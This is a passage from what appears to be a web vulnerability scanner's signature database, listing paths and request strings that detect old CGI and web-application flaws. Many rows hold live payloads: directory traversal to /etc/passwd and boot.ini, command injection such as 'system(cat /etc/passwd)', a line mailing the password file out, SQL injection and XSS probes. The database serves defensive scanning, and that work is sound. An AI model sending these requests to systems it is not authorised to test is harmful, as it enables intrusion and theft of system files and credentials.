Java (JServ) pages are present." c,generic,/servlet/,SessionServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,SimpleServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,SnoopServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,sunexamples.BBoardServlet,200,GET,"This default servlet lets attackers execute arbitrary commands." c,generic,/session/,admnlogin,200,GET,"SessionServlet Output, has session cookie info." c,generic,/shop/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/shoponline/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/shopping/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/shoppingdirectory/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server." c,generic,/SilverStream/Meta/Tables/,?access-mode=text,"_DBProduct",GET,"The SilverStream database structure is available for remote viewing." c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","root:",GET,"Web DataBlade 4.12/Informix is vulnerable to SQL Injection." c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","root:",GET,"IBM Informix Web DataBlade allows remote execute of SQL" c,generic,/SiteScope/htdocs/,SiteScope.html,200,GET,"The SiteScope install may allow remote users to get sensitive information about the hosts being monitored." c,generic,/sunshop.,index.php?action=storenew&username=,"",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02." c,generic,/support/,common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read files on the host." c,generic,/supporter/,index.php?t=ticketfiles&id=<script></script>,"",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/supporter/,index.php?t=tickettime&id=<script></script>,"",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/supporter/,index.php?t=updateticketlog&id=<script></script>,"",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/us/cgi-bin/,sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini,"boot loader",GET,"Default scripts can allow arbitrary access to the host." c,generic,/users/scripts/,submit.cgi,200,GET,"This might be interesting..." c,generic,/WEB-INF./,web.xml,200,GET,"Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt fore more info." c,generic,/webcart-lite/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." c,generic,/webcart-lite/config/,import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." c,generic,/webcart/,carts/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." c,generic,/webcart/,config/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." c,generic,/webcart/,config/clients.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." c,generic,/webcart/,orders/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." c,generic,/webcart/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." c,generic,/webMathematica/,MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif,"root:",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/" c,generic,/webMathematica/,MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif,"boot loader",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/" c,generic,/WebShop/logs/,cc.txt,200,GET,"This might be interesting..." c,generic,/WebShop/templates/,cc.txt,200,GET,"This might be interesting..." c,generic,/webtools/bonsai/,"ccvsblame.cgi?file=/index.html&root=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvsblame.cgi?file=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvslog.cgi?file=*&rev=&root=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvslog.cgi?file=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvsquery.cgi?branch=&file=&date=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/webtools/bonsai/,"showcheckins.cgi?person=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/Web_Store/,web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html,"root:",GET,"eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name." c,generic,/wikihome/action/,conflict.php,200,GET,"Some versions of this script allow external source to be included/run by appending ?TemplateDir=http://my.host/ to requests." c,generic,/wwwboard/,passwd.txt,200,GET,"The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version." c,generic,/wwwboard/,wwwboard.cgi,200,GET,"This might be interesting..." c,generic,/wwwboard/,wwwboard.pl,200,GET,"This might be interesting..." c,generic,/wwwthreads/,3tvars.pm,200,GET,"This might be interesting..." c,generic,/wwwthreads/,w3tvars.pm,200,GET,"This might be interesting..." c,generic,/xdk,/,"Oracle XML Development",GET,"Default Oracle documentation found." c,generic,/xsql/demo/adhocsql/,query.xsql?sql=select%20username%20from%20ALL_USERS,"USERNAME",GET,"This allows attackers to perform queries to the Oracle database. This sample app should be removed." c,generic,/xsql/demo/airport/,airport.xsql?xml-stylesheet=none,"cvsroot",GET,"This is a sample file which should be removed. Oracle XSQL allows arbitrary code to be execute." c,generic,/~/,.asp,"",GET,"Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02" c,generic,/~/,.aspx,"",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02" c,generic,/~/,.aspx?aspxerrorpath=null,"",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02" c,generic,@CGIDIRS,"alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to execute arbitrary commands on the server." c,generic,@CGIDIRS,"ccvsblame.cgi?file=/index.html&root=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","resolv.conf",GET,"Allows attacker to execute commands as http daemon. Upgrade or remove." c,generic,@CGIDIRS,"cvsblame.cgi?file=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"cvslog.cgi?file=*&rev=&root=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"cvslog.cgi?file=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"cvsquery.cgi?branch=&file=&date=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"excite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com",200,GET,"Excite software is vulnerable to password file theft remotely." c,generic,@CGIDIRS,"FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","root:",GET,"This CGI allows attackers to read files and execute commands remotely." c,generic,@CGIDIRS,"info2www '(../../../../../../../bin/mail root ","root:",GET,"This CGI allows attackers to execute commands. passwd file may have been mailed to root." c,generic,@CGIDIRS,"login.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>","",GET,"BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","root:",GET,"Remote file retrieval." c,generic,@CGIDIRS,"sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3","Unknown configuration",GET,"The Sawmill CGI allows attackers to read the Sawmill password." c,generic,@CGIDIRS,"shop.pl/page=;cat%20shop.pl|","\/perl",GET,"Shopping Cart (Hassan) allows execution of remote commands. CAN-2001-0985." c,generic,@CGIDIRS,"showcheckins.cgi?person=","",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","",GET,"urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/?cvsroot=","",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\">;","",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." c,generic,@CGIDIRS,%2e%2e/abyss.conf,200,GET,"The Abyss configuration file was successfully retrievd. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/" c,generic,@CGIDIRS,,"Directory Listing",GET,"Directory indexing of CGI directory should be disabled." c,generic,@CGIDIRS,,"Index of ",GET,"Directory indexing of CGI directory should be disabled." c,generic,@CGIDIRS,.access,200,GET,"Contains authorization information" c,generic,@CGIDIRS,.cobalt,200,GET,"May allow remote admin of CGI scripts." c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=

    Hello!

    ,"",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02" c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=,"alert('Vulnerable')",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=,"",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,.fhp,200,GET,"This might be interesting..." c,generic,@CGIDIRS,.htaccess,200,GET,"Contains authorization information" c,generic,@CGIDIRS,.htaccess.old,200,GET,"Backup/Old copy of .htaccess - Contains authorization information" c,generic,@CGIDIRS,.htaccess.save,200,GET,"Backup/Old copy of .htaccess - Contains authorization information" c,generic,@CGIDIRS,.htaccess~,200,GET,"Backup/Old copy of .htaccess - Contains authorization information" c,generic,@CGIDIRS,.htpasswd,200,GET,"Contains authorization information" c,generic,@CGIDIRS,.passwd,200,GET,"Contains authorization information" c,generic,@CGIDIRS,/,stat.pl,200,GET,"Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER. c,generic,@CGIDIRS,/ans/ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely." c,generic,@CGIDIRS,/GW5/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system." c,generic,@CGIDIRS,/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system." c,generic,@CGIDIRS,/rightfax/fuwww.dll/?,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,/scripts/*%0a.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,14all-1.1.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." c,generic,@CGIDIRS,14all.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." c,generic,@CGIDIRS,a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host." c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host." c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval." c,generic,@CGIDIRS,a1stats/a1disp4.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval." c,generic,@CGIDIRS,addbanner.cgi,200,GET,"This CGI may allow attackers to read any file on the system." c,generic,@CGIDIRS,adduser.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,add_ftp.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,admin.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,admin.cgi?list=../../../../../../../../../../etc/passwd,"root:",GET,"Add2it Mailman Free V1.73 allows arbitrary files to be retrieved." c,generic,@CGIDIRS,admin.php,200,GET,"This might be interesting..." c,generic,@CGIDIRS,admin.php3,200,GET,"This might be interesting..." c,generic,@CGIDIRS,admin.pl,200,GET,"Might be interesting" c,generic,@CGIDIRS,adminhot.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." c,generic,@CGIDIRS,adminwww.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." c,generic,@CGIDIRS,af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system." c,generic,@CGIDIRS,aglimpse,200,GET,"This CGI may allow attackers to execute remote commands." c,generic,@CGIDIRS,aglimpse.cgi,200,GET,"This CGI may allow attackers to execute remote commands." c,generic,@CGIDIRS,Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0,"resolv.conf",GET,"This CGI allows attackers to view arbitrary files on the host." c,generic,@CGIDIRS,alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system." c,generic,@CGIDIRS,amadmin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,anacondaclip.pl?template=../../../../../../../../../../etc/passwd,"root:",GET,"This allows attackers to read arbitrary files from the server." c,generic,@CGIDIRS,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely." c,generic,@CGIDIRS,AnyBoard.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,AnyForm,200,GET,"This might be interesting..." c,generic,@CGIDIRS,AnyForm2,200,GET,"This might be interesting..." c,generic,@CGIDIRS,apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/,"root:",GET,"This allows attackers to read arbitrary files from the server." c,generic,@CGIDIRS,architext_query.cgi,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands." c,generic,@CGIDIRS,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands." c,generic,@CGIDIRS,ash,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,AT-admin.cgi,200,GET,"Admin interface...no known holes" c,generic,@CGIDIRS,AT-generate.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=&Where=&Sort=Photo&Dir=,"",GET,"Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,auktion.cgi?menue=../../../../../../../../../../etc/passwd,"root:",GET,"The CGI allows attackers to read arbitrary files remotely." c,generic,@CGIDIRS,auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,awl/auctionweaver.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,awstats.pl,"Traffic",GET,"Free realtime logfile analyzer for advanced web statistics. Should be protected." c,generic,@CGIDIRS,ax-admin.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,ax.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,axs.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,badmin.cgi,200,GET,"BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade." c,generic,@CGIDIRS,banner.cgi,200,GET,"This CGI may allow attackers to read any file on the system." c,generic,@CGIDIRS,bannereditor.cgi,200,GET,"This CGI may allow attackers to read any file on the system." c,generic,@CGIDIRS,bash,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files." c,generic,@CGIDIRS,bb-hist?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files." c,generic,@CGIDIRS,bb-histlog.sh,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd,"root:",GET,"Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system." c,generic,@CGIDIRS,bbs_forum.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" c,generic,@CGIDIRS,betsie/parserl.pl/;,,"",GET,"BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,bizdb1-search.cgi,200,GET,"This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm" c,generic,@CGIDIRS,bnbform,200,GET,"This might be interesting..." c,generic,@CGIDIRS,bnbform.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10,"root:",GET,"This CGI allows attackers to read arbitrary files on the server." c,generic,@CGIDIRS,boozt/admin/index.cgi?section=5&input=1,200,GET,"Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha." c,generic,@CGIDIRS,bsguest.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,bslist.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,bulk/bulk.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password." c,generic,@CGIDIRS,cached_feed.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,cachemgr.cgi,200,GET,"Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans." c,generic,@CGIDIRS,calendar/calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,calendar/index.cgi,200,GET,"Mike's Calendar CGI contained a bug which allowed arbitrary command exectution (version 1.4), see http://freshmeat.net/projects/mycalendar/" c,generic,@CGIDIRS,calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,calender_admin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,cal_make.pl?p0=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,campas?%0acat%0a/etc/passwd%0a,"root:",GET,"This CGI allows attackers to read arbitrary files on the server." c,generic,@CGIDIRS,cart.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,cart32.exe,200,GET,"request cart32.exe/cart32clientlist" c,generic,@CGIDIRS,cartmanager.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,cbmc/forums.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,cgi-lib.pl,200,GET,"CGI Library. If retrieved check to see if it is outdated, it may have vuls" c,generic,@CGIDIRS,cgicso?query=,"",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands." c,generic,@CGIDIRS,cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the server." c,generic,@CGIDIRS,cgimail.exe,200,GET,"This might be interesting..." c,generic,@CGIDIRS,cgiwrap,200,GET,"Some versions of cgiwrap allow anyone to execute commands remotely." c,generic,@CGIDIRS,change-your-password.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." c,generic,@CGIDIRS,classified.cgi,200,GET,"Check Phrack 55 for info by RFP" c,generic,@CGIDIRS,classifieds,200,GET,"This might be interesting..." c,generic,@CGIDIRS,classifieds.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,classifieds/classifieds.cgi,200,GET,"Mike's Classifieds CGI contained a bug which allowed arbitrary command exectution (version 1.2), see http://freshmeat.net/projects/myclassifieds/" c,generic,@CGIDIRS,clickcount.pl?view=test,200,GET,"This might be interesting..." c,generic,@CGIDIRS,clickresponder.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,code.php,200,GET,"This might be interesting..." c,generic,@CGIDIRS,code.php3,200,GET,"This might be interesting..." c,generic,@CGIDIRS,commandit.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html,"root:",GET,"This CGI allows attackers to read arbitrary files on the server." c,generic,@CGIDIRS,common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read files on the host." c,generic,@CGIDIRS,compatible.cgi,200,GET,"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,Count.cgi,200,GET,"This may allow attackers to execute arbitrary commands on the server" c,generic,@CGIDIRS,count.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,counter-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,counterbanner,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,counterbanner-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,counterfiglet-ord,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,counterfiglet/nc/,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." c,generic,@CGIDIRS,csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." c,generic,@CGIDIRS,csh,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." c,generic,@CGIDIRS,csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd'),"root:",GET,"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." c,generic,@CGIDIRS,csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`,"root:",GET,"csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CAN-2002-0495." c,generic,@CGIDIRS,cstat.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,c_download.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,dasp/fm_shell.asp,200,GET,"This might be interesting..." c,generic,@CGIDIRS,day5datacopier.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,day5datanotifier.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,db2www/library/document.d2w/show,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,dbman/db.cgi?db=no-db,200,GET,"This CGI allows remote attackers to view system information." c,generic,@CGIDIRS,db_manager.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,DCFORMS98.CGI,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00,"root:",GET,"This install of DCForum allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,dcshop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,DCShop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,dcshop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,DCShop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,dfire.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,diagnose.cgi,200,GET,"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,dig.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the server." c,generic,@CGIDIRS,displayTC.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,dnewsweb,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,donothing,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,download.cgi,200,GET,"v1 by Matt Wright; check info in Phrack 55 by RFP" c,generic,@CGIDIRS,dumpenv.pl,200,GET,"This CGI gives a lot of information to attackers." c,generic,@CGIDIRS,echo.bat,200,GET,"This CGI may allow attackers to execute remote commands." c,generic,@CGIDIRS,echo.bat?&dir+c:\,200,GET,"This batch file may allow attackers to execute remote commands." c,generic,@CGIDIRS,edit.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,empower?DB=whateverwhatever,"db name whateverwhatever of directory /",GET,"This CGI allows attackers to learn the full system path to your web directory." c,generic,@CGIDIRS,emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." c,generic,@CGIDIRS,emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." c,generic,@CGIDIRS,emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." 